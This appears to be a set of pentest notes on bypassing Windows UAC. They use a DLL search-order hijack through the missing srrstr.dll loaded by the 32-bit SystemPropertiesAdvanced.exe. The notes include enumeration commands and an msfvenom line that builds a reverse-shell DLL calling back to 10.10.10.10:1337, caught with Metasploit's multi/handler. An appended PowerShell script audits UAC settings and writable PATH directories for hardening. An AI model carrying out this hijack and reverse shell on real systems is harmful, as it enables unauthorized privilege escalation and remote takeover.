User Account Control (UAC)
User Account Control (UAC) is a Windows security feature that prevents unauthorized changes by requiring administrative approval for certain actions. It helps mitigate malware infections by running processes with standard privileges unless explicitly elevated. UAC prompts appear when a program requests elevated permissions, ensuring user awareness of system modifications. Disabling UAC reduces security, making the system more vulnerable to privilege escalation attacks.
Enumeration
# Identify the current user and SID
whoami /user
# Confirm Admin Group Membership
net localgroup administrators
# Review User Privileges
whoami /priv
# Check the OS build (to cross-reference against the Windows version)
[environment]::OSVersion.Version
# Confirming UAC is Enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
# If UAC is Enabled, at what level?
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
UAC Bypass
The 32-bit version of SystemPropertiesAdvanced.exe attempts to load a non-existent DLL, srrstr.dll, which belongs to the System Restore functionality. Because the file does not exist, a crafted DLL with that name placed on the search path gets loaded instead, so we can craft a malicious DLL for a reverse shell as SYSTEM.
Windows searches for a DLL in this order:
- The application's directory.
- C:\Windows\System32 (for 64-bit systems).
- C:\Windows\System (for 16-bit; not present on 64-bit).
- The Windows directory.
- Directories in the PATH environment variable. (GOOD HIT?!)
# List the PATH entries
cmd /c echo %PATH%
# Look for user-writable directories among the PATH entries
# Generate malicious DLL
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=1337 -f dll > srrstr.dll
# Upload the DLL into a user-writable directory that is in the target host's PATH
# Now execute the 32-bit SystemPropertiesAdvanced.exe; the reverse shell should arrive at this point
C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
Use Metasploit's multi/handler to catch the reverse shell connection.
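The UAC checks from the enumeration section and the PATH-writability check above can be combined into one hardening audit. This is an added PowerShell script, not part of the original notes; it assumes it runs on the host being assessed and reads the same registry values the REG QUERY commands above return.

```powershell
# Added hardening audit (not part of the original notes): report the UAC
# configuration and flag PATH directories that low-privilege principals can
# write to, since those are where a search-order DLL hijack would land.
$key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$uac = Get-ItemProperty -Path $key

# Meaning of ConsentPromptBehaviorAdmin values (per Microsoft documentation)
$levels = @{
    0 = 'Elevate without prompting (no protection for admin sessions)'
    1 = 'Prompt for credentials on the secure desktop'
    2 = 'Prompt for consent on the secure desktop (Always notify)'
    3 = 'Prompt for credentials'
    4 = 'Prompt for consent'
    5 = 'Prompt for consent for non-Windows binaries only (default)'
}
$enabled = ([int]$uac.EnableLUA -eq 1)
$level   = [int]$uac.ConsentPromptBehaviorAdmin
"UAC enabled              : $enabled"
"Admin prompt behaviour   : $level - $($levels[$level])"
"Prompt on secure desktop : $([int]$uac.PromptOnSecureDesktop -eq 1)"
if (-not $enabled -or $level -eq 0) {
    'WARNING: admin elevation is silent (no prompt at all)'
} elseif ($level -eq 5) {
    'NOTE: default level; signed Windows binaries marked autoElevate elevate without a prompt'
}

# Principals that any local user or interactive session maps to
$lowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# WriteData/CreateFiles (0x2), GENERIC_WRITE (0x40000000), GENERIC_ALL (0x10000000)
$writeBits = 0x2 -bor 0x40000000 -bor 0x10000000
foreach ($dir in ($env:Path -split ';' | Where-Object { $_ })) {
    if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
        "MISSING : $dir (fix or remove; a creatable entry is also a hijack location)"
        continue
    }
    $acl = Get-Acl -LiteralPath $dir -ErrorAction SilentlyContinue
    if (-not $acl) { "UNREADABLE: $dir (could not read ACL)"; continue }
    $weak = $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $lowPriv -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights -band $writeBits) -ne 0)
    }
    if ($weak) {
        "WRITABLE: $dir by $(@($weak.IdentityReference.Value | Select-Object -Unique) -join ', ')"
    }
}
```

$env:Path is the merged machine and user PATH of the account running the script, so run it as the account whose exposure you are assessing; any WRITABLE or MISSING entry should be removed or have its ACL tightened.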